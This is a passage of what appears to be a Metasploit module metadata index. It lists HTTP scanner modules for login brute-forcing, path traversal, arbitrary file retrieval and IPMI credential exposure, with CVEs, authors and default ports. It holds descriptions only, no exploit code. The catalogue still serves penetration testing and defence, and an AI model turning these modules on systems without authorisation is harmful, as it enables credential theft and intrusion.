"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb",
"is_install_path": true,
"ref_name": "scanner/http/oracle_demantra_database_credentials_leak",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/oracle_demantra_file_retrieval": {
"name": "Oracle Demantra Arbitrary File Retrieval with Authentication Bypass",
"full_name": "auxiliary/scanner/http/oracle_demantra_file_retrieval",
"rank": 300,
"disclosure_date": "2014-02-28",
"type": "auxiliary",
"author": [
"Oliver Gruskovnjak"
],
"description": "This module exploits a file download vulnerability found in Oracle\n Demantra 12.2.1 in combination with an authentication bypass. By\n combining these exposures, an unauthenticated user can retrieve any file\n on the system by referencing its full file path on a vulnerable\n machine.",
"references": [
"CVE-2013-5877",
"CVE-2013-5880",
"URL-https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5877/",
"URL-https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5880/"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb",
"is_install_path": true,
"ref_name": "scanner/http/oracle_demantra_file_retrieval",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/oracle_ilom_login": {
"name": "Oracle ILO Manager Login Brute Force Utility",
"full_name": "auxiliary/scanner/http/oracle_ilom_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for the Oracle Integrated Lights Out Manager (ILO) login portal, and\n performs a login brute force attack to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/oracle_ilom_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/oracle_ilom_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/owa_ews_login": {
"name": "OWA Exchange Web Services (EWS) Login Scanner",
"full_name": "auxiliary/scanner/http/owa_ews_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Rich Whitcroft"
],
"description": "This module attempts to log in to the Exchange Web Services, often\n exposed at https://example.com/ews/, using NTLM authentication. This\n method is faster and simpler than traditional form-based logins.\n\n In most cases, all you need to set is RHOSTS and some combination of\n user/pass files; the autodiscovery should find the location of the NTLM\n authentication point as well as the AD domain, and use them accordingly.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/owa_ews_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/owa_ews_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/owa_iis_internal_ip": {
"name": "Outlook Web App (OWA) / Client Access Server (CAS) IIS HTTP Internal IP Disclosure",
"full_name": "auxiliary/scanner/http/owa_iis_internal_ip",
"rank": 300,
"disclosure_date": "2012-12-17",
"type": "auxiliary",
"author": [
"Nate Power"
],
"description": "This module tests vulnerable IIS HTTP header file paths on Microsoft\n Exchange OWA 2003 and CAS 2007, 2010, and 2013 servers.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb",
"is_install_path": true,
"ref_name": "scanner/http/owa_iis_internal_ip",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/owa_login": {
"name": "Outlook Web App (OWA) Brute Force Utility",
"full_name": "auxiliary/scanner/http/owa_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Vitor Moreira",
"Spencer McIntyre",
"SecureState R&D Team",
"sinn3r <sinn3r@metasploit.com>",
"Brandon Knight",
"Pete (Bokojan) Arzamendi",
"Nate Power",
"Chapman (R3naissance) Schleiss",
"Andrew Smith"
],
"description": "This module tests credentials on OWA 2003, 2007, 2010, 2013, and 2016 servers.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-02-23 13:16:41 +0000",
"path": "/modules/auxiliary/scanner/http/owa_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/owa_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/phpmyadmin_login": {
"name": "PhpMyAdmin Login Scanner",
"full_name": "auxiliary/scanner/http/phpmyadmin_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Shelby Pace"
],
"description": "This module will attempt to authenticate to PhpMyAdmin.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-24 23:21:59 +0000",
"path": "/modules/auxiliary/scanner/http/phpmyadmin_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/phpmyadmin_login",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/pocketpad_login": {
"name": "PocketPAD Login Bruteforce Utility",
"full_name": "auxiliary/scanner/http/pocketpad_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for the PocketPAD login portal, and\n performs a login bruteforce attack to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/pocketpad_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/pocketpad_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/prev_dir_same_name_file": {
"name": "HTTP Previous Directory File Scanner",
"full_name": "auxiliary/scanner/http/prev_dir_same_name_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies files in the first parent directory with the same name as\n the given directory path. Example: Testing /backup/files/ will look for the\n following files: /backup/files.ext.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb",
"is_install_path": true,
"ref_name": "scanner/http/prev_dir_same_name_file",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/radware_appdirector_enum": {
"name": "Radware AppDirector Bruteforce Login Utility",
"full_name": "auxiliary/scanner/http/radware_appdirector_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for Radware AppDirector's web login portal, and performs login brute force\n to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/radware_appdirector_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/radware_appdirector_enum",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/rails_json_yaml_scanner": {
"name": "Ruby on Rails JSON Processor YAML Deserialization Scanner",
"full_name": "auxiliary/scanner/http/rails_json_yaml_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"jjarmoc",
"hdm <x@hdm.io>"
],
"description": "This module attempts to identify Ruby on Rails instances vulnerable to\n an arbitrary object instantiation flaw in the JSON request processor.",
"references": [
"CVE-2013-0333"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/rails_json_yaml_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/rails_mass_assignment": {
"name": "Ruby On Rails Attributes Mass Assignment Scanner",
"full_name": "auxiliary/scanner/http/rails_mass_assignment",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Gregory Man <man.gregory@gmail.com>"
],
"description": "This module scans Ruby On Rails sites for\n models with attributes not protected by attr_protected or attr_accessible.\n After attempting to assign a non-existent field, the default rails with\n active_record setup will raise an ActiveRecord::UnknownAttributeError\n exception, and reply with HTTP code 500.",
"references": [
"URL-http://guides.rubyonrails.org/security.html#mass-assignment"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/rails_mass_assignment.rb",
"is_install_path": true,
"ref_name": "scanner/http/rails_mass_assignment",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/rails_xml_yaml_scanner": {
"name": "Ruby on Rails XML Processor YAML Deserialization Scanner",
"full_name": "auxiliary/scanner/http/rails_xml_yaml_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"jjarmoc"
],
"description": "This module attempts to identify Ruby on Rails instances vulnerable to\n an arbitrary object instantiation flaw in the XML request processor.",
"references": [
"CVE-2013-0156",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/rails_xml_yaml_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/replace_ext": {
"name": "HTTP File Extension Scanner",
"full_name": "auxiliary/scanner/http/replace_ext",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies the existence of additional files\n by modifying the extension of an existing file.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/replace_ext.rb",
"is_install_path": true,
"ref_name": "scanner/http/replace_ext",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/rewrite_proxy_bypass": {
"name": "Apache Reverse Proxy Bypass Vulnerability Scanner",
"full_name": "auxiliary/scanner/http/rewrite_proxy_bypass",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"chao-mu"
],
"description": "Scan for poorly configured reverse proxy servers.\n By default, this module attempts to force the server to make\n a request with an invalid domain name. Then, if the bypass\n is successful, the server will look it up and of course fail,\n then respond with a status code 502. A baseline status code\n is always established and if that baseline matches your test\n status code, the injection attempt does not occur.\n \"set VERBOSE true\" if you are paranoid and want to catch potential\n false negatives. Works best against Apache and mod_rewrite.",
"references": [
"URL-http://www.contextis.com/research/blog/reverseproxybypass/",
"CVE-2011-3368"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb",
"is_install_path": true,
"ref_name": "scanner/http/rewrite_proxy_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/rfcode_reader_enum": {
"name": "RFCode Reader Web Interface Login / Bruteforce Utility",
"full_name": "auxiliary/scanner/http/rfcode_reader_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module simply attempts to log in to an RFCode Reader web interface.\n Please note that by default there is no authentication. In such a case, password brute force will not be performed.\n If there is authentication configured, the module will attempt to find valid login credentials and capture device information.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/rfcode_reader_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/rfcode_reader_enum",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/rips_traversal": {
"name": "RIPS Scanner Directory Traversal",
"full_name": "auxiliary/scanner/http/rips_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"localh0t",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability in the RIPS Scanner v0.54,\n allowing arbitrary files to be read with the web server's privileges.",
"references": [
"EDB-18660",
"URL-http://codesec.blogspot.com.br/2015/03/rips-scanner-v-054-local-file-include.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/rips_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/rips_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/riverbed_steelhead_vcx_file_read": {
"name": "Riverbed SteelHead VCX File Read",
"full_name": "auxiliary/scanner/http/riverbed_steelhead_vcx_file_read",
"rank": 300,
"disclosure_date": "2017-06-01",
"type": "auxiliary",
"author": [
"Gregory DRAPERI <gregory.draper_at_gmail.com>",
"h00die"
],
"description": "This module exploits an authenticated arbitrary file read in the log module's filter engine.\n SteelHead VCX (VCX255U) version 9.6.0a was confirmed as vulnerable.",
"references": [
"EDB-42101"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/riverbed_steelhead_vcx_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/http/riverbed_steelhead_vcx_file_read",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/robots_txt": {
"name": "HTTP Robots.txt Content Scanner",
"full_name": "auxiliary/scanner/http/robots_txt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "Detect robots.txt files and analyze their content",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/robots_txt.rb",
"is_install_path": true,
"ref_name": "scanner/http/robots_txt",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/s40_traversal": {
"name": "S40 0.4.2 CMS Directory Traversal Vulnerability",
"full_name": "auxiliary/scanner/http/s40_traversal",
"rank": 300,
"disclosure_date": "2011-04-07",
"type": "auxiliary",
"author": [
"Osirys <osirys@autistici.org>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability found in S40 CMS.\n The flaw is due to the 'page' function not properly handling the $pid parameter,\n which allows a malicious user to load an arbitrary file path.",
"references": [
"OSVDB-82469",
"EDB-17129"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/s40_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/s40_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/sap_businessobjects_user_brute": {
"name": "SAP BusinessObjects User Bruteforcer",
"full_name": "auxiliary/scanner/http/sap_businessobjects_user_brute",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Joshua Abraham <jabra@rapid7.com>"
],
"description": "This module attempts to bruteforce SAP BusinessObjects users.\n The dswsbobje interface is only used to verify valid credentials for CmcApp.\n Therefore, any valid credentials that have been identified can be leveraged by\n logging into CmcApp.",
"references": [
"URL-http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb",
"is_install_path": true,
"ref_name": "scanner/http/sap_businessobjects_user_brute",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/sap_businessobjects_user_brute_web": {
"name": "SAP BusinessObjects Web User Bruteforcer",
"full_name": "auxiliary/scanner/http/sap_businessobjects_user_brute_web",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Joshua Abraham <jabra@rapid7.com>"
],
"description": "This module simply attempts to bruteforce SAP BusinessObjects users by using CmcApp.",
"references": [
"URL-http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf"
],
"platform": "",
"arch": "",
"rport": 6405,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
6405
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb",
"is_install_path": true,
"ref_name": "scanner/http/sap_businessobjects_user_brute_web",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/sap_businessobjects_user_enum": {
"name": "SAP BusinessObjects User Enumeration",
"full_name": "auxiliary/scanner/http/sap_businessobjects_user_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Joshua Abraham <jabra@rapid7.com>"
],
"description": "This module simply attempts to enumerate SAP BusinessObjects\n users. The dswsbobje interface is only used to verify valid\n users for CmcApp. Therefore, any valid users that have been\n identified can be leveraged by logging into CmcApp.",
"references": [
"URL-http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/sap_businessobjects_user_enum",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/sap_businessobjects_version_enum": {
"name": "SAP BusinessObjects Version Detection",
"full_name": "auxiliary/scanner/http/sap_businessobjects_version_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Joshua Abraham <jabra@rapid7.com>"
],
"description": "This module simply attempts to identify the version of SAP BusinessObjects.",
"references": [
"URL-http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/sap_businessobjects_version_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/scraper": {
"name": "HTTP Page Scraper",
"full_name": "auxiliary/scanner/http/scraper",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "Scrape defined data from a specific web page based on a regular expression",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/scraper.rb",
"is_install_path": true,
"ref_name": "scanner/http/scraper",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/sentry_cdu_enum": {
"name": "Sentry Switched CDU Bruteforce Login Utility",
"full_name": "auxiliary/scanner/http/sentry_cdu_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for ServerTech's Sentry Switched CDU (Cabinet Power\n Distribution Unit) web login portals, and performs login brute force\n to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/sentry_cdu_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/sentry_cdu_enum",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/servicedesk_plus_traversal": {
"name": "ManageEngine ServiceDesk Plus Path Traversal",
"full_name": "auxiliary/scanner/http/servicedesk_plus_traversal",
"rank": 300,
"disclosure_date": "2015-10-03",
"type": "auxiliary",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits an unauthenticated path traversal vulnerability found in ManageEngine\n ServiceDesk Plus build 9110 and lower. The module will retrieve any file on the filesystem\n with the same privileges as Support Center Plus is running. On Windows, files can be retrieved\n with SYSTEM privileges. The issue has been resolved in ServiceDesk Plus build 91111 (issue SD-60283).",
"references": [
"URL-https://www.manageengine.com/products/service-desk/readme-9.1.html"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/servicedesk_plus_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/sevone_enum": {
"name": "SevOne Network Performance Management Application Brute Force Login Utility",
"full_name": "auxiliary/scanner/http/sevone_enum",
"rank": 300,
"disclosure_date": "2013-06-07",
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for SevOne Network Performance Management System Application,\n finds its version, and performs login brute force to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/sevone_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/sevone_enum",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/simple_webserver_traversal": {
"name": "Simple Web Server 2.3-RC1 Directory Traversal",
"full_name": "auxiliary/scanner/http/simple_webserver_traversal",
"rank": 300,
"disclosure_date": "2013-01-03",
"type": "auxiliary",
"author": [
"CwG GeNiuS",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability found in\n Simple Web Server 2.3-RC1.",
"references": [
"CVE-2002-1864",
"OSVDB-88877",
"EDB-23886",
"URL-https://seclists.org/bugtraq/2013/Jan/12"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/simple_webserver_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/simple_webserver_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/smt_ipmi_49152_exposure": {
"name": "Supermicro Onboard IPMI Port 49152 Sensitive File Exposure",
"full_name": "auxiliary/scanner/http/smt_ipmi_49152_exposure",
"rank": 300,
"disclosure_date": "2014-06-19",
"type": "auxiliary",
"author": [
"Zach Wikholm <kestrel@trylinux.us>",
"John Matherly <jmath@shodan.io>",
"Dan Farmer <zen@fish2.com>",
"hdm <x@hdm.io>"
],
"description": "This module abuses a file exposure vulnerability accessible through the web interface\n on port 49152 of Supermicro Onboard IPMI controllers. The vulnerability allows an attacker\n to obtain detailed device information and download data files containing the clear-text\n usernames and passwords for the controller. In May of 2014, at least 30,000 unique IPs\n were exposed to the internet with this vulnerability.",
"references": [
"URL-http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/",
"URL-https://github.com/zenfish/ipmi/blob/master/dump_SM.py"
],
"platform": "",
"arch": "",
"rport": 49152,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb",
"is_install_path": true,
"ref_name": "scanner/http/smt_ipmi_49152_exposure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/smt_ipmi_cgi_scanner": {
"name": "Supermicro Onboard IPMI CGI Vulnerability Scanner",
"full_name": "auxiliary/scanner/http/smt_ipmi_cgi_scanner",
"rank": 300,
"disclosure_date": "2013-11-06",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module checks for known vulnerabilities in the CGI applications of\n Supermicro Onboard IPMI controllers. These issues currently include\n several unauthenticated buffer overflows in the login.cgi and close_window.cgi\n components.",
"references": [
"CVE-2013-3621",
"CVE-2013-3623",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/smt_ipmi_cgi_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/smt_ipmi_static_cert_scanner": {
"name": "Supermicro Onboard IPMI Static SSL Certificate Scanner",
"full_name": "auxiliary/scanner/http/smt_ipmi_static_cert_scanner",
"rank": 300,
"disclosure_date": "2013-11-06",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"juan"
],
"description": "This module checks for a static SSL certificate shipped with Supermicro Onboard IPMI\n controllers. An attacker with access to the publicly-available firmware can perform\n man-in-the-middle attacks and offline decryption of communication to the controller.\n This module has been tested on a Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware\n version SMT_X9_214.",
"references": [
"CVE-2013-3619",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb",
"is_install_path": true,
